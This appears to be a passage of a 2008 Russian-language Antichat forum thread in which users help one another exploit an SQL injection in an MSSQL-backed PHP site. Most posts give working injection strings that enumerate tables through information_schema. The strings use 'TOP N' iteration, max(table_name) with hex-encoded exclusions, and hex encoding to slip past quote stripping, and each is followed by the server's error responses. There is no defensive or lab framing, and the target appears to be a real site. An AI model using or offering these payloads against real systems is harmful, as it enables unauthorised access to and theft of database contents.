HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.03.2008, 16:49
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

Используй в not+in 0x + hex кодирование.
 
Ответить с цитированием

  #12  
Старый 22.03.2008, 16:57
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

вот запрос
id=1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','sy ssegmentssyssegments','syssegmentssyssegmentssysse gments')))--

ответ
Warning: mssql_query() [function.mssql-query]: message: Invalid column name 'syssegmentssyssegmentssyssegmentssyssegmentssysse gmentssyssegments'. (severity 16)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
 
Ответить с цитированием

  #13  
Старый 22.03.2008, 17:05
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

потом

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

потом

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

и т.д.
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #14  
Старый 22.03.2008, 17:06
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

message: Invalid column name имя калонки неверно...
'syssegmentssyssegmentssyssegmentssyssegmentssysse gmentssyssegments'-хм мож админы извращенцы так таблицы называть??
 
Ответить с цитированием

  #15  
Старый 22.03.2008, 17:08
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

ReVOLVeR, фигню пишешь, просто при обработке запроса скриптом, из него удаляются кавычки и скорее всего запятые
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #16  
Старый 22.03.2008, 17:16
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

попробовал то что мне скаща scipio
ответ
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
 
Ответить с цитированием

  #17  
Старый 22.03.2008, 17:45
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

тогда делай:
(select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473 )

потом:
(select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473 +and+table_name<>захексенный результат)

и т.д. добавляй and`ы
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #18  
Старый 22.03.2008, 18:45
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

вобщем в hex выводит все время только
(0x7379737365676D656E7473)syssegments

Последний раз редактировалось -=megahertz=-; 22.03.2008 в 18:49..
 
Ответить с цитированием

  #19  
Старый 22.03.2008, 18:55
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от -=megahertz=-  
вобщем в hex выводит все время только
(0x7379737365676D656E7473)syssegments
напиши запрос который используешь и полностью ошибку
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #20  
Старый 22.03.2008, 19:00
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

1+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+0x7379737365676D656E7473+ and+table_name+0x7379737365676d656e7473+and+table_ name+0x7379737365676d656e7473+and+table_name+0x737 9737365676d656e7473)--

вместо <> поставил + так как выводил ерор

Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Toolkit для работы с mysql inj от меня Piflit PHP 33 09.06.2010 22:03
Mssql уддаленный дамп delay(0) Уязвимости 12 08.07.2008 15:36
Чтение данных с MsSql constanta Уязвимости 5 25.02.2008 20:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.